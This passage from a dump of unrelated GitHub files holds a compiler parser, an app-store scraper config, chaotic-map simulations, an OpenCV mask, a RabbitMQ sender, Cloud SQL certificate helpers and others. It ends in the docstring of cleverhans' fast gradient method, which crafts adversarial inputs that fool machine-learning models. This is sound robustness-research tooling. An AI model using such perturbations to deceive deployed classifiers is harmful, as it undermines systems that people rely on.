lex_unit)\n lex()\n\n elif ret_token == token_dict[\"minusTK\"]:\n\n if sys.argv[2] == \"-verbose\" : print(\"\\tADD_OPER\\t\" + lex_unit)\n lex()\n\n else:\n print(\"\"\"\n ****************************** SYN ERROR ******************************\n\n -Invalid Syntax\n --Invalid ADDITION OPERATOR used!\n ---[NOTE]: Read EEL's documentation file to see which\n options are available for add op usage!\n\n -Error spotted at Line: %d\n\n ****************************** SYN ERROR ******************************\n MUL_OPER()\"\"\" %(line))\n exit()\n\n# -- ::= * | / -- #\ndef MUL_OPER():\n\n if sys.argv[2] == \"-verbose\" : print(\"35.\")\n\n global ret_token\n\n if ret_token == token_dict[\"mulTK\"]:\n\n if sys.argv[2] == \"-verbose\" : print(\"\\tMUL_OPER\\t\" + lex_unit)\n lex()\n\n elif ret_token == token_dict[\"divTK\"]:\n\n if sys.argv[2] == \"-verbose\" : print(\"\\tMUL_OPER\\t\" + lex_unit)\n lex()\n else:\n print(\"\"\"\n ****************************** SYN ERROR ******************************\n\n -Invalid Syntax\n --Invalid MULTIPLICATION OPERATOR used!\n ---[NOTE]: Read EEL's documentation file to see which\n options are available for mul op usage!\n\n -Error spotted at Line: %d\n\n ****************************** SYN ERROR ******************************\n MUL_OPER()\"\"\" %(line))\n exit()\n\n# -- ::= e | -- #\ndef OPTIONAL_SIGN():\n\n if sys.argv[2] == \"-verbose\" : print(\"36.\")\n\n global ret_token\n\n if ret_token == token_dict[\"plusTK\"] or ret_token == token_dict[\"minusTK\"]:\n\n if sys.argv[2] == \"-verbose\" : print(\"*** OPTIONAL_SIGN ==> ADD_OPER ***\") \n ADD_OPER()\n\n # e : Not using an add operator is acceptable.\n\n\n# *********** [MAIN FUNCTION] *********** #\nif __name__ == '__main__':\n\n try:\n \n if sys.argv[2] != \"-verbose\" and sys.argv[2] != \"-skip\" : raise IndexError\n if \".eel\" in sys.argv[1] : raise IOError\n\n global code \n #global line\n eel_source_code = sys.argv[1]\n code = open(eel_source_code+\".eel\")\n\n # Lexical Test #\n if sys.argv[2] == \"-verbose\" : print(\" ===========> START OF LEX !! 
<=========== \")\n a = lex()\n verbose_iterator = 0;\n if sys.argv[2] == \"-verbose\" : print(str(verbose_iterator)+\".\"+\" \"+ str(a) + \"\\t\\t\" + lex_unit)\n\n while(a != token_dict[\"eofTK\"]):\n\n a = lex()\n verbose_iterator = verbose_iterator + 1;\n if sys.argv[2] == \"-verbose\" : print(str(verbose_iterator)+\".\"+\" \"+ str(a) + \"\\t\\t\" + lex_unit)\n\n if sys.argv[2] == \"-skip\" : print(\"\\n\\tLEX Test:\\t[ OK! ]\")\n \n # Reset the File Pointer and Line Counter\n code.seek(0,0)\n line = 1 \n\n # Syntax Test #\n \n lex()\n PROGRAM()\n if sys.argv[2] == \"-skip\" : print(\"\\tSYN Test:\\t[ OK! ]\\n\")\n\n code.close()\n\n except IndexError: \n print(\"\"\"\nUsage: python EELC.py [source file name] [options]\nWhere possible options include:\n\n -verbose\\t Output messages about what the compiler is doing. \n \\t Redirection is reccomended due to wealth of text messages.\n \\t [ e.g >python EELC.py example -verbose > output.txt ] \n\n -skip \\t Output messages only for the progression of the analysis.\n \\t Outputs \"OK!\" messages on success.\n \"\"\")\n except IOError:\n print(\"\"\"\nUsage: python EELC.py [source file name] [options]\n \n - \".eel\" Ending is not required on [source file name]!\n\n - [ e.g >python EELC.py example -skip] )\n \"\"\")\n\n","repo_name":"NikosDelijohn/EEL-Compiler","sub_path":"EELC_Lexsyn.py","file_name":"EELC_Lexsyn.py","file_ext":"py","file_size_in_byte":64359,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"7"} +{"seq_id":"9294820694","text":"#!/bin/env python\n#-*- coding:utf-8 -*-\n\nimport re\nfrom baseclass import baseclass\n\nclass HiApkItemConfig(baseclass):\n domain = \"apk.hiapk.com\"\n\n def __init__ (self):\n self.config = {\n \"app_id\": {\n \"select\": \"//a[@class=\\\"linkbtn d1\\\"]/@href\",\n \"result\":0,\n \"additional\": self.post_appid_hiapk,\n },\n\n \"app_version\": {\n \"select\": \"//label[@id=\\\"ctl00_AndroidMaster_Content_Apk_SoftVersionName\\\"]/text()\",\n \"result\": 0,\n },\n\n \"market\": {\n # pass in\n },\n\n \"name\": {\n \"select\": '//label[@id=\\\"ctl00_AndroidMaster_Content_Apk_SoftName\\\"]/text()' ,\n \"result\": 0,\n },\n\n \"size\": {\n \"select\": \"//label[@id=\\\"ctl00_AndroidMaster_Content_Apk_SoftSize\\\"]/text()\",\n \"result\": 0,\n },\n\n \"language\": {\n \"select\": '//label[@id=\\\"ctl00_AndroidMaster_Content_Apk_SoftName\\\"]/text()' ,\n \"result\": 0,\n \"additional\": self.post_lang_hiapk,\n },\n\n \"package_name\": {\n # cannot found, parse by decompilating\n },\n\n \"developer\": {\n \"select\": \"//label[@id=\\\"ctl00_AndroidMaster_Content_Apk_SoftDeveloper\\\"]/text()\",\n \"result\": 0,\n },\n\n \"update_time\": {\n \"select\": \"//label[@id=\\\"ctl00_AndroidMaster_Content_Apk_SoftPublishTime\\\"]/text()\",\n \"result\": 0,\n },\n\n \"description\": {\n \"select\": \"//label[@id=\\\"ctl00_AndroidMaster_Content_Apk_Description\\\"]/text()\",\n \"result\": 0,\n },\n\n \"category_general\": {\n # pass in\n },\n\n \"category_detail\": {\n \"select\": \"//span[@id=\\\"ctl00_AndroidMaster_Content_Soft_CurrentCategory\\\"]/text()\",\n \"result\": 0,\n },\n\n \"icon\": {\n \"select\": \"//div[@class=\\\"detail_content\\\"]/div[1]/div[1]/img/@src\",\n \"result\": 0\n },\n\n \"images\": {\n \"select\": \"//div[@class=\\\"screenimg\\\"]//img/@src\",\n },\n\n \"comment_url\": {\n \"select\": \"//input[@id=\\\"PublishSoft_ApkId\\\"]/@value | //input[@id=\\\"PublishSoft_SoftCode\\\"]/@value\",\n \"result\":1000,\n \"additional\": 
self.post_commenturl_hiapk,\n },\n\n \"package_url\": {\n \"select\": \"//a[@class=\\\"linkbtn d1\\\"]/@href\",\n \"result\":1000,\n \"additional\": self.post_packageurl_hiapk,\n },\n\n \"url\": {\n # pass in\n },\n\n \"related_app\": {\n \"select\": \"//div[@id=\\\"relatedSoftBox\\\"]//dt/a/text()\",\n },\n\n \"os_support_version\": {\n \"select\": \"//label[@id=\\\"ctl00_AndroidMaster_Content_Apk_SoftSuitSdk\\\"]/text()\",\n \"result\":0,\n },\n\n #\"price\": {\n # \"select\": \"//ul[@id=\\\"detail_line_ul\\\"]/li[6]/span/text()\",\n # \"result\":0,\n # \"additional\": self.post_price_anzh,\n #},\n\n #\"email\": {\n # \"select\": \"//ul[@id=\\\"detail_line_ul\\\"]/li[6]/text()\",\n # \"result\":0,\n # \"additional\": self.post_price_anzh,\n #},\n #\"devpage\": {\n # \"select\": \"//ul[@id=\\\"detail_line_ul\\\"]/li[6]/text()\",\n # \"result\":0,\n # \"additional\": self.post_price_anzh,\n #},\n }\n\n def post_appid_hiapk (self, val_raw):\n val = re.findall(r'[0-9].*[0-9]', val_raw, re.M)[0]\n return val\n\n def post_lang_hiapk (self, val_raw):\n if len (val_raw.encode (\"utf-8\")) != len (val_raw):\n return \"ch\"\n else:\n return \"en\"\n\n def post_commenturl_hiapk (self, val_raw):\n return val_raw\n\n def post_packageurl_hiapk (self, val_raw):\n return val_raw\n","repo_name":"coolyinger/crawler","sub_path":"market/HiApkItem.py","file_name":"HiApkItem.py","file_ext":"py","file_size_in_byte":4492,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"36863705338","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Sep 15 17:36:34 2022\n\n@author: tomasnotenson\n\"\"\"\n# import os\n\nfrom qutip import *\nfrom time import time\nfrom numba import jit\n# importing \"cmath\" for complex number operations\nfrom cmath import phase\nfrom random import random\nimport seaborn as sns\nfrom scipy.stats import norm, multivariate_normal\nfrom scipy.linalg import eig\nimport scipy.sparse as ss\nfrom scipy.sparse.linalg import eigs\nimport numpy as np\nimport matplotlib as mpl\nimport matplotlib.pyplot as plt\nfrom tqdm import tqdm # customisable progressbar decorator for iterators\n# import seaborn as sb\n# from sklearn.linear_model import LinearRegression #Regresión Lineal con scikit-learn\n\nplt.rcParams.update({\n\"text.usetex\": True,\n\"font.family\": \"sans-serif\",\n\"font.sans-serif\": [\"Helvetica\"], \"font.size\": 16})\n\ndpi = 2*np.pi\n\n@jit\ndef standard_map(q,p,K):\n '''\n One iteration of standard map.\n (q,p) -standard-map-> (qf,pf)\n\n Parameters\n ----------\n q : float\n initial position value\n p : float\n initial momentum value\n K : float\n kick amplitude. 
chaos parameter\n\n Returns\n -------\n qf : float\n final position value\n pf : float\n final momentum value\n\n '''\n pf = (p + K/(dpi)*np.sin(dpi*q))%1\n qf = (q + pf)%1\n return qf, pf\n\n@jit\ndef standard_map_absorption(q,p,K,a=2):\n pf = (p + K*np.sin(q+p/2))*(a*K)-a*K/2\n qf = (q + (p+pf)/2)%dpi\n \n # assert (-a*K/2<=pf and pf<=a*K/2), 'no está en el intervalo permitido [-aK/2,aK/2]'\n \n return qf, pf\n\n@jit\ndef standard_map_dissipation(q,p,K,eta=0.3):\n pf = (p + K*np.sin(q))%(8*np.pi)-4*np.pi\n qf = (q + pf)%(dpi)\n \n assert (-4*np.pi<=pf and pf<=4*np.pi), 'no está en el intervalo [-4pi,4pi]'\n \n return qf, pf\n\n@jit\ndef Harper_map(q,p,K):\n pf = (p-K*np.sin(dpi*q))%1\n qf = (q+K*np.sin(dpi*pf))%1\n return qf, pf \n\n@jit\n# probar con K = 0.01, 0.02\ndef perturbed_cat_map(q,p,K):\n pf = (p + q - dpi*K*np.sin(dpi*q))%1\n qf = (q + pf + dpi*K*np.sin(dpi*pf))%1\n return qf, pf\n\n@jit\ndef CI(qj,pj,paso):\n '''\n Take random (q,p) values in cell of width \"paso\"\n\n Parameters\n ----------\n qj : float\n minimum value of position in cell\n pj : float\n minimum value of momentum in cell\n paso : float\n width of cell. In gral, paso=1/N\n\n Returns\n -------\n q : float\n random position in cell\n p : float\n random momentum in cell\n\n '''\n rq = np.random.uniform()*paso\n rp = np.random.uniform()*paso\n \n q = qj+rq\n p = pj+rp\n \n # print('CI', q,p)\n return q,p\n\n# @jit\n# def cae_en_celda(qf,pf,qi,pi,paso):\n# '''\n# Check if (qf,pf) is in cell or not\n\n# Parameters\n# ----------\n# qf : float\n# position to check\n# pf : float\n# momentum to check\n# qi : float\n# mininum position of cell\n# pi : float\n# mininum momentum of cell\n# paso : float\n# width of cell. In gral, paso=1/N\n\n# Returns\n# -------\n# cond : bool\n# True if (qf,pf) is in cell. False if not\n\n# '''\n \n# cond1 = (0<(qf-qi) and (qf-qi)1/2:\n # cont+=1\n \n # print(qf, pf, nqi, npi, i)\n \n S[i,j] += 1\n normaj[j] += 1\n for j in range(Nmitad):\n if normaj[j] != 0:\n S[:,j] /= normaj[j]\n # print(np.sum(S[:,j]))\n assert (np.sum(S[:,j]) - 1.0) < 1e-3, f'ojo con sum_i Sij = {np.sum(S[:,j])} para j={j}'\n # print(cont/Nc)\n return S\n\n@jit\ndef eigenvec_j_to_qp(eigenvector, mapa='normal'):\n '''\n Change representation of eigenvalues from cells to (q,p)\n\n Parameters\n ----------\n eigenvector : array_like\n state in cell representation.\n mapa : string, optional\n Map of interest. 
The default is 'normal'.\n\n Returns\n -------\n eig_res : array_like\n state in (q,p) representation.\n\n '''\n N = len(eigenvector)\n Nx = int(np.sqrt(N))\n paso = 1\n eig_res = np.zeros((Nx,Nx), dtype=np.complex_)\n for j in range(N):\n q,p = qp_from_j(j, Nx, paso, mapa)\n # print(int(q),int(p))\n eig_res[int(q),int(p)] = eigenvector[j]\n return eig_res\n# plot parameters\nplt.rcParams['text.usetex'] = True\n\nfont_size=20\nletter_size=22\nlabel_size=25\ntitle_font=28\nlegend_size=23\n\nfrom matplotlib import rc\nrc('font', family='serif', size=font_size)\nrc('text', usetex=True)\n\n\n\nmpl.rcParams['lines.linewidth'] = 2\nmpl.rcParams['axes.labelsize'] = label_size\nmpl.rcParams['xtick.minor.visible']=True\nmpl.rcParams['xtick.major.size']=6\nmpl.rcParams['xtick.minor.size']=3\nmpl.rcParams['xtick.major.width']=1.4\nmpl.rcParams['xtick.minor.width']=0.9\nmpl.rcParams['xtick.direction']='in'\n\nmpl.rcParams['ytick.minor.visible']=True\nmpl.rcParams['ytick.major.size']=6\nmpl.rcParams['ytick.minor.size']=3\nmpl.rcParams['ytick.major.width']=2.1\nmpl.rcParams['ytick.minor.width']=1.3\nmpl.rcParams['ytick.direction']='in'\n\nmpl.rcParams['ytick.direction']='in'\n\n\n\nmpl.rcParams['legend.fontsize']=legend_size\n\n\n\nimport matplotlib.ticker\nclass MyLocator(matplotlib.ticker.AutoMinorLocator):\n def __init__(self, n=2):\n super().__init__(n=n)\nmatplotlib.ticker.AutoMinorLocator = MyLocator \n\n\nmarker_sz = 10\nlocation='upper left'\nproperties={'size':12}\nwidth_plot=8\n\n\n\ndef get_axis_limits(ax, scalex=.1, scaley=.85):\n return (ax.get_xlim()[0] + (ax.get_xlim()[1]-ax.get_xlim()[0])*scalex, ax.get_ylim()[0]+(ax.get_ylim()[1]-ax.get_ylim()[0])*scaley)\n\ncolorlist=[plt.cm.brg(i) for i in np.linspace(0, 1, 6)]\n#%% simulation Ks\nNeff = 60\nruido = 1/(2*np.pi*Neff)#1/2**8#[0.00390625]#1/2**np.arange(1,3,2)*110 # abs\n \nmapa = 'normal'#'absortion'#'dissipation'#'normal'#'cat'#'Harper'#\nmethod = 'Ulam'#'one_trayectory'#\neta = 0.3\na = 2\ncx = 1\n\naxis = 'both'\nmodulo = 1\n\nKpaso = 0.8\nKs = np.arange(0,20.1,Kpaso)#0.971635406\n\nNc = int(1e3)#int(2.688e7)#int(1e8)#\n#\nk = 45\nfor ki in tqdm(range(len(Ks)), desc='loop K'):\n K = Ks[ki]\n Nx = int(cx*Neff)\n N = Nx**2\n \n print(f'N={Neff}d',f'e={ruido}')\n \n paso = 1/Nx\n \n if (mapa=='normal' or mapa=='absortion' or mapa=='cat' or mapa=='Harper'):\n if method=='one_trayectory':\n S = Ulam_one_trayectory(N, Nx, paso, Nc, K, mapa) \n elif method=='Ulam':\n S = Ulam(N=N, Nx=Nx, paso=paso, Nc=Nc, K=K, mapa=mapa, ruido=ruido, modulo=modulo, axis=axis)\n \n elif mapa=='dissipation':\n S = Ulam_one_trayectory(N, Nx, paso, Nc, K, mapa)\n\n # diagonalize operator\n t0=time()\n e, evec = eigs(S, k=k)\n eabs = np.abs(e)\n evec=evec[:,eabs.argsort()[::-1]]\n e = e[eabs.argsort()][::-1]\n t1=time()\n print(f'\\nDiagonalización: {t1-t0} seg')\n flag = f'Ulam_approximation_method{method}_mapa{mapa}_Sij_eigenvals_N{Neff}_ruido_abs{ruido}_axis{axis}_grilla{cx}N_K{K:1f}_Nc{Nc}'\n np.savez(flag+'.npz', e=e, evec=evec[:,:k])\n del S; del e; del evec;\n#%% simulation Ns\n# # Neff = 128\n# Ns = np.arange(55,91)\n# ruido = 1/2**8#[0.00390625]#1/2**np.arange(1,3,2)*110 # abs\n \n# mapa = 'normal'#'absortion'#'dissipation'#'normal'#'cat'#'Harper'#\n# method = 'Ulam'#'one_trayectory'#\n# cx = 1\n\n# Kpaso = 0\n# Ks = [19]\n\n# Nc = int(1e3)#int(2.688e7)#int(1e8)#\n# #\n# k = 45\n# for ni in tqdm(range(len(Ns)), desc='loop N'):\n# Neff = Ns[ni]\n# Nx = int(cx*Neff)\n# N = Nx**2\n \n# K = Ks[0]\n# # print(f'N={Neff}d',f'e={ruido}')\n \n# paso = 1/Nx\n \n# 
if (mapa=='normal' or mapa=='absortion' or mapa=='cat' or mapa=='Harper'):\n# if method=='one_trayectory':\n# S = Ulam_one_trayectory(N, Nx, paso, Nc, K, mapa) \n# elif method=='Ulam':\n# S = Ulam(N=N, Nx=Nx, paso=paso, Nc=Nc, K=K, mapa=mapa, ruido=ruido)\n \n# elif mapa=='dissipation':\n# S = Ulam_one_trayectory(N, Nx, paso, Nc, K, mapa)\n\n# # diagonalize operator\n# t0=time()\n# e, evec = eigs(S, k=k)\n# eabs = np.abs(e)\n# evec=evec[:,eabs.argsort()[::-1]]\n# e = e[eabs.argsort()][::-1]\n# t1=time()\n# print(f'\\nDiagonalización: {t1-t0} seg')\n# flag = f'Ulam_approximation_method{method}_mapa{mapa}_Sij_eigenvals_N{Neff}_ruido_abs{ruido}_grilla{cx}N_K{K:1f}_Nc{Nc}'\n# np.savez(flag+'.npz', e=e, evec=evec[:,:k])\n# del S; del e; del evec;\n#%% cambiar nombre de archivos\n# import os\n\n# Ns = np.arange(58,89)\n\n# for ni in range(len(Ns)):\n \n# # Absolute path of a file\n# old_name = f\"Ulam_approximation_methodUlam_mapanormal_Sij_eigenvals_N{Ns[ni]}_ruido_abs0.00390625_grilla1N_K18.000000_Nc1000.npz\"\n# new_name = f\"Ulam_approximation_methodUlam_mapanormal_Sij_eigenvals_N{Ns[ni]}_ruido_abs0.00390625_grilla1N_K13_Nc1000.npz\"\n \n# # Renaming the file\n# os.rename(old_name, new_name)","repo_name":"tnotenson/quantum-chaos","sub_path":"Ulam_tofu.py","file_name":"Ulam_tofu.py","file_ext":"py","file_size_in_byte":15702,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"519849707","text":"import numpy as np\nimport cv2 as cv\n\ncap = cv.VideoCapture (0)\n\nwhile True:\n _, frame = cap.read ()\n\n hsv = cv.cvtColor (frame, cv.COLOR_BGR2HSV)\n\n lower_green = np.array ([40, 100, 0])\n upper_green = np.array ([80, 255, 255])\n\n mask = cv.inRange (hsv, lower_green, upper_green)\n\n res = cv.bitwise_and (frame, frame, mask=mask)\n\n cv.imshow(\"Original\", frame)\n cv.imshow(\"white\", mask)\n cv.imshow(\"green\", res)\n\n k = cv.waitKey(5) & 0xFF\n if k == 27:\n break\n\ncv.destroyAllWindows()\n","repo_name":"BinaryFuck/opencv","sub_path":"green.py","file_name":"green.py","file_ext":"py","file_size_in_byte":521,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"41324198867","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @author: similraface\n# @contact: similarface@gmail.com\n# @software: PyCharm\n# @file: sender.py\n# @time: 2022/6/12 7:18 下午\n# @desc:\n\n\"\"\"\nProducer ---> exchange.normal+fanout---> quenue.normal\n \\_dlx__> exchange.dlx+direct--->quene.dlx\n\"\"\"\nimport json\nimport time\n\nimport pika\n\nfrom main import Sender\n\nif __name__ == '__main__':\n sender = Sender(url=\"amqp://guest:guest@localhost:5672\")\n\n # 正常交换机\n exchange_normal = \"exchange_normal\"\n # 正常队列\n quenue_normal = \"quenue_normal\"\n # 正常路由\n routing_key = \"routing_normal\"\n\n # 死信交换机\n exchange_dlx = \"exchange.dlx\"\n # 死信队列\n quenue_dlx = \"dead_letter_queue\"\n dead_letter_routing_key = \"dead_letter_routing_key_a\"\n\n arguments = {\n \"x-message-ttl\": 5000,\n \"x-dead-letter-exchange\": exchange_dlx,\n \"x-dead-letter-routing-key\": dead_letter_routing_key\n }\n\n sender.channel.confirm_delivery()\n\n sender.channel.exchange_declare(exchange=exchange_normal, durable=True, exchange_type=\"direct\")\n result = sender.channel.queue_declare(queue=quenue_normal, durable=False, arguments=arguments)\n sender.channel.queue_bind(exchange=exchange_normal, queue=quenue_normal, routing_key=routing_key)\n\n for i in range(10):\n message = json.dumps({\"OrderId\": i})\n 
sender.channel.basic_publish(exchange=exchange_normal,\n routing_key=routing_key,\n body=message,\n properties=pika.BasicProperties(delivery_mode=2)\n )\n print(message)\n time.sleep(1.5)\n sender.close()\n","repo_name":"similarface/rabbitmqdocs","sub_path":"dlxs/sender.py","file_name":"sender.py","file_ext":"py","file_size_in_byte":1780,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"7"} +{"seq_id":"4500686495","text":"from Parser.GrammarParser import *\nfrom CodeGenerator.Generator import *\nfrom Semantic_Analyzer.SemanticAnalyzer import *\n\nlexicalAnalyzer = LexicalAnalyzer('test.cpp')\nlexicalAnalyzerResult = lexicalAnalyzer.startParsing()\n\nprint()\nif lexicalAnalyzerResult:\n\n grammarParser = GrammarParser()\n grammarParser.parseJsonRules('grammar.json')\n\n earley = Earley(grammarParser.rules, \"<программа>\")\n\n earleyParseResult = earley.parse(lexicalAnalyzer.lexemeArray)\n earley.printTableToFile()\n earley.printError()\n earleyTable = earley.table\n\n if earleyParseResult:\n treeBuilder = TreeBuilder(earleyTable, grammarParser.rules)\n treeBuilder.buildTree()\n treeBuilder.printTreeToFile()\n\n generator = Generator(treeBuilder.tree)\n generator.generate()\n print(generator.resultCode)\n\n variableStorage = VariableStorage()\n semanticAnalyser = VariableSemanticAnalyser(treeBuilder.tree)\n semanticAnalyser.parse(treeBuilder.tree, variableStorage)\n\n print()\n","repo_name":"drainkid/cpppascaltranslator","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1036,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"25039780747","text":"import sys\n# setting path\nsys.path.append('../TM2_segmentation')\n\nimport os\nimport numpy as np\nimport nibabel as nib\nimport itk\nimport pandas as pd\nimport tarfile\n\nfrom scripts.preprocess_utils import find_file_in_path, register_to_template\n\n# load metadata file \n\ninput_annotation_file = 'data/csv_files/PediatricMRI_DEMOGRAPHICS.csv' \ndf = pd.read_csv(input_annotation_file, header=0)\ninput_path = \"data/nimh_peds_mri_lr02/\"\nsave_to = 'data/t1_mris/nihm_reg/'\n\nage_ranges = {\"data/golden_image/mni_templates/nihpd_asym_04.5-08.5_t1w.nii\" : {\"min_age\":3, \"max_age\":7},\n \"data/golden_image/mni_templates/nihpd_asym_07.5-13.5_t1w.nii\": {\"min_age\":8, \"max_age\":13},\n \"data/golden_image/mni_templates/nihpd_asym_13.0-18.5_t1w.nii\": {\"min_age\":14, \"max_age\":35}}\n\nfinal_metadata = []\n#print(df)\nfor idx in range(0, df.shape[0]):\n row = df.iloc[idx]\n age = row['AGE_MONTHS_DOV_TO_DOB'] \n sex = row['SUBJECT_GENDER']\n if 'Female' in sex:\n sex = 2\n else:\n sex = 1\n print(age, sex)\n for filepath in os.listdir(input_path):\n if str(row['SRC_SUBJECT_ID']) in filepath and row['TIMEPOINT_LABEL'].lower() in filepath :\n for golden_file_path, age_values in age_ranges.items():\n if age_values['min_age'] <= age//12 and age//12 <= age_values['max_age']: \n print(age, input_path+filepath, save_to, golden_file_path)\n register_to_template(input_path+filepath, save_to, golden_file_path, create_subfolder=False)\n #0,AGE_M,SEX,SCAN_PATH,Filename,dataset\n final_metadata.append([age,sex,save_to+filepath,filepath,'HIMH'])\n break\ndf = pd.DataFrame(final_metadata)\ndf.to_csv(path_or_buf= 
\"data/Dataset_nihm.csv\")\n\n","repo_name":"AIM-KannLab/itmt","sub_path":"data_curation_scripts/curate_nimh.py","file_name":"curate_nimh.py","file_ext":"py","file_size_in_byte":1789,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"7"} +{"seq_id":"27763970649","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import unicode_literals\n\nACTIVE_CERT_LABEL = 'Current'\nNEXT_CERT_LABEL = 'Next'\nPREVIOUS_CERT_LABEL = 'Previous'\n\n\ndef ListServerCas(sql_client, sql_messages, instance_ref):\n \"\"\"Calls the list server CAs endpoint and returns the response.\"\"\"\n return sql_client.instances.ListServerCas(\n sql_messages.SqlInstancesListServerCasRequest(\n project=instance_ref.project, instance=instance_ref.instance))\n\n\ndef GetServerCaTypeDict(list_server_cas_response):\n \"\"\"Gets a dictionary mapping Server CA Cert types to certs.\n\n The keys to the dictionary returned will be some combinatiaon of 'Current',\n 'Next', and 'Previous'.\n\n Args:\n list_server_cas_response: InstancesListServerCasResponse instance.\n\n Returns:\n A dictionary mapping Server CA Cert types to SslCert instances.\n \"\"\"\n server_ca_types = {}\n\n active_id = list_server_cas_response.activeVersion\n\n # Get the active cert.\n certs = list_server_cas_response.certs\n active_cert = None\n for cert in certs:\n if cert.sha1Fingerprint == active_id:\n active_cert = cert\n break\n if not active_cert:\n # No server CA types can be discerned; return an empty dict.\n return server_ca_types\n server_ca_types[ACTIVE_CERT_LABEL] = active_cert\n\n # Get the inactive certs.\n inactive_certs = [cert for cert in certs if cert.sha1Fingerprint != active_id]\n if len(inactive_certs) == 1:\n inactive_cert = inactive_certs[0]\n if inactive_cert.createTime > active_cert.createTime:\n # Found the next cert.\n server_ca_types[NEXT_CERT_LABEL] = inactive_cert\n else:\n # Found the previous cert.\n server_ca_types[PREVIOUS_CERT_LABEL] = inactive_cert\n elif len(inactive_certs) > 1:\n # Sort by expiration date.\n inactive_certs = sorted(inactive_certs, key=lambda cert: cert.createTime)\n server_ca_types[PREVIOUS_CERT_LABEL] = inactive_certs[0]\n server_ca_types[NEXT_CERT_LABEL] = inactive_certs[-1]\n\n return server_ca_types\n\n\ndef GetCurrentServerCa(sql_client, sql_messages, instance_ref):\n \"\"\"Returns the currently active Server CA Cert.\"\"\"\n server_ca_types = GetServerCaTypeDict(\n ListServerCas(sql_client, sql_messages, instance_ref))\n return server_ca_types.get(ACTIVE_CERT_LABEL)\n\n\ndef GetNextServerCa(sql_client, sql_messages, instance_ref):\n \"\"\"Returns the upcoming Server CA Cert.\"\"\"\n server_ca_types = GetServerCaTypeDict(\n ListServerCas(sql_client, sql_messages, instance_ref))\n return server_ca_types.get(NEXT_CERT_LABEL)\n\n\ndef GetPreviousServerCa(sql_client, sql_messages, instance_ref):\n \"\"\"Returns the previously active Server CA Cert.\"\"\"\n server_ca_types = GetServerCaTypeDict(\n ListServerCas(sql_client, sql_messages, instance_ref))\n return server_ca_types.get(PREVIOUS_CERT_LABEL)\n","repo_name":"twistedpair/google-cloud-sdk","sub_path":"google-cloud-sdk/lib/googlecloudsdk/api_lib/sql/ssl/server_ca_certs.py","file_name":"server_ca_certs.py","file_ext":"py","file_size_in_byte":2824,"program_lang":"python","lang":"en","doc_type":"code","stars":55,"dataset":"github-code","pt":"7"} +{"seq_id":"20247354752","text":"from setuptools import setup\n\nwith open ('README.rst') as f:\n long_description = 
f.read()\n\nsetup(\n name='wslexplorer',\n version='0.1.2',\n description='Simple script that launches Window Explorer from Windows Subsystem for Linux',\n long_description=long_description,\n url='https://github.com/scottfp/wslexplorer',\n author='Scott Pritchard',\n author_email='scottfp@gmail.com',\n license='MIT',\n py_modules=['wslexplorer.win_explorer',\n 'wslexplorer.config'],\n install_requires=[\n 'Click',\n 'ruamel.yaml'\n ],\n entry_points='''\n [console_scripts]\n wslexplorer=wslexplorer.win_explorer:launch\n '''\n)\n","repo_name":"scottfp/wslexplorer","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":679,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"7"} +{"seq_id":"32225515873","text":"\"\"\"\r\nhttp://www.django-rest-framework.org/api-guide/serializers/\r\n\r\n\"\"\"\r\n\r\nfrom rest_framework import serializers\r\n\r\nfrom ...models import RapidTitle\r\n\r\n\r\nclass RapidTitleSerializer(serializers.HyperlinkedModelSerializer):\r\n tconst = serializers.HyperlinkedRelatedField(\r\n many=False,\r\n read_only=True,\r\n view_name='title-detail',\r\n lookup_field='tconst'\r\n )\r\n\r\n class Meta:\r\n model = RapidTitle\r\n fields = [\r\n 'id',\r\n 'created',\r\n 'updated',\r\n 'tconst',\r\n 'title',\r\n 'titleType',\r\n 'image_url',\r\n 'remote_id',\r\n ]\r\n","repo_name":"AmalgamProjects/flixfinder-backend","sub_path":"src/ff_api/serializers/full/rapid.py","file_name":"rapid.py","file_ext":"py","file_size_in_byte":662,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"72232543904","text":"import jax.numpy as np\nfrom jax import grad, vmap\nfrom jax.nn import log_softmax as logsoftmax\n\nfrom cleverhans.jax.utils import one_hot\n\n\ndef fast_gradient_method(\n model_fn, x, eps, norm, clip_min=None, clip_max=None, y=None, targeted=False\n):\n \"\"\"\n JAX implementation of the Fast Gradient Method.\n :param model_fn: a callable that takes an input tensor and returns the model logits.\n :param x: input tensor.\n :param eps: epsilon (input variation parameter); see https://arxiv.org/abs/1412.6572.\n :param norm: Order of the norm (mimics NumPy). Possible values: np.inf or 2.\n :param clip_min: (optional) float. Minimum float value for adversarial example components.\n :param clip_max: (optional) float. Maximum float value for adversarial example components.\n :param y: (optional) Tensor with one-hot true labels. If targeted is true, then provide the\n target one-hot label. Otherwise, only provide this parameter if you'd like to use true\n labels when crafting adversarial samples. Otherwise, model predictions are used\n as labels to avoid the \"label leaking\" effect (explained in this paper:\n https://arxiv.org/abs/1611.01236). Default is None. This argument does not have\n to be a binary one-hot label (e.g., [0, 1, 0, 0]), it can be floating points values\n that sum up to 1 (e.g., [0.05, 0.85, 0.05, 0.05]).\n :param targeted: (optional) bool. 
